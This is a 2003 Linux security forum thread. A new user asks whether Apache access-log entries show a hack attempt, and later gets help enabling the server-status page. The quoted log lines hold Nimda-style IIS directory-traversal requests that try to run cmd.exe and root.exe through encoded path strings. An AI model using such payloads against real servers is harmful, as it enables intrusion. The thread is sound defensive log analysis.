LinuxQuestions.org
Share your knowledge at the LQ Wiki.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 08-12-2003, 07:13 AM   #1
lucastic
Member
 
Registered: Aug 2003
Location: Oz
Distribution: Gentoo - Debian
Posts: 202

Rep: Reputation: 30
newbie question: do these logs show a hack attempt


Hello,

I am new to Linux, liking it much more than windows every day. I have set up a very simple server and was wondering if someone could look at the access_log files and tell me if they look suspicious.
Or is it just harmless server chatter.

I noticed they were trying to execute?? .../cmd.exe, root.exe and c+dir commands.

By the way, can anyone tell me how to get good realtime monitoring for a small server, ie to see whos online and how long they have been browsing etc? I have looked in my bible and online and can find nothing comprehensive about it, accept for /server-info and /server-status both of which I cannot seem to get working.

Thanks in advance

Lucas

203.162.20.212 - - [11/Aug/2003:15:43:36 +091800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
203.162.20.212 - - [11/Aug/2003:15:43:38 +091800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
203.162.20.212 - - [11/Aug/2003:15:43:39 +091800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
203.162.20.212 - - [11/Aug/2003:15:43:40 +091800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
203.162.20.212 - - [11/Aug/2003:15:43:42 +091800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
203.162.20.212 - - [11/Aug/2003:15:43:43 +091800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
203.162.20.212 - - [11/Aug/2003:15:43:45 +091800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
203.162.20.212 - - [11/Aug/2003:15:43:46 +091800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
203.162.20.212 - - [11/Aug/2003:15:43:48 +091800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
203.162.20.212 - - [11/Aug/2003:15:43:52 +091800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
203.162.20.212 - - [11/Aug/2003:15:43:54 +091800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
203.162.20.212 - - [11/Aug/2003:15:43:55 +091800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
203.162.20.212 - - [11/Aug/2003:15:43:56 +091800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
203.162.20.212 - - [11/Aug/2003:15:43:58 +091800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
203.162.20.212 - - [11/Aug/2003:15:43:59 +091800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
203.162.20.212 - - [11/Aug/2003:15:44:00 +091800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
 
Old 08-12-2003, 07:34 AM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
IIRC, that looks like a Nimda scan. It's a Microsoft worm that looks for a series of exploits in MS IIS webservers . Aside from the annoying amount of length they take up in your access_log files, they are harmless to all non-microsoft webservers.

Several of the lines look for common misconfigurations, several attempt to execute commands by using the double-decode weakness to move into the server root. Either way you don't have to worry.

server-status is usually running by default. Access might be restricted to the loopback interface (http://127.0.0.1/server-status).
 
Old 08-12-2003, 12:16 PM   #3
lucastic
Member
 
Registered: Aug 2003
Location: Oz
Distribution: Gentoo - Debian
Posts: 202

Original Poster
Rep: Reputation: 30
Hi,

Thanks for your previous reply.

However, could someone please help; I cannot seem to get .../server-status working at all. I have edited httpd.conf in the .../apache2/conf file
here is a bit from my httpd.conf

<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

I have turned extended server status on, and still nothing?

I am using redhat 9 with the latest downloaded apache, and I cannot figure out why server-status is not working.

If it was working should there be a file called server-status in the /htdocs file?

Thanks

Lucas
 
Old 08-12-2003, 01:16 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
If you have a static ip address, all you have to do is put that in there. You can even put in a partial address, like 192.168. (which would allow access from the whole subnet). So if you want to access the server status page from 192.168.1.2, your httpd.conf file would look like this:

#
# Allow server status reports, with the URL of http://servername/server-status
# Change the ".your-domain.com" to match your domain to enable.
#
<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 192.168.1.2
</Location>


Make sure that you are uncomenting the server status section as well as restarting apache so that it re-reads the .conf file. If apache is up and running, you should be able to access it. (I just tried this on a fresh install and it works)
 
Old 08-13-2003, 08:07 AM   #5
lucastic
Member
 
Registered: Aug 2003
Location: Oz
Distribution: Gentoo - Debian
Posts: 202

Original Poster
Rep: Reputation: 30
Thanks it worked.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Apache logs - Hack attempt or not? lawadm1 Linux - Software 6 11-05-2004 11:53 PM
UBER-Newbie Wants To Attempt A Debian Install - PLEASE ADVISE Rexversusu Linux - Newbie 9 10-23-2004 12:36 PM
not linux related, had a hack attempt neo77777 General 13 03-22-2002 04:57 PM
access.log:Possible Hack attempt? plisken Linux - Security 5 01-04-2002 02:40 PM
boot disk required after login -- newbie, first intall attempt kgjac Linux - Software 1 10-10-2001 01:59 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 03:37 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration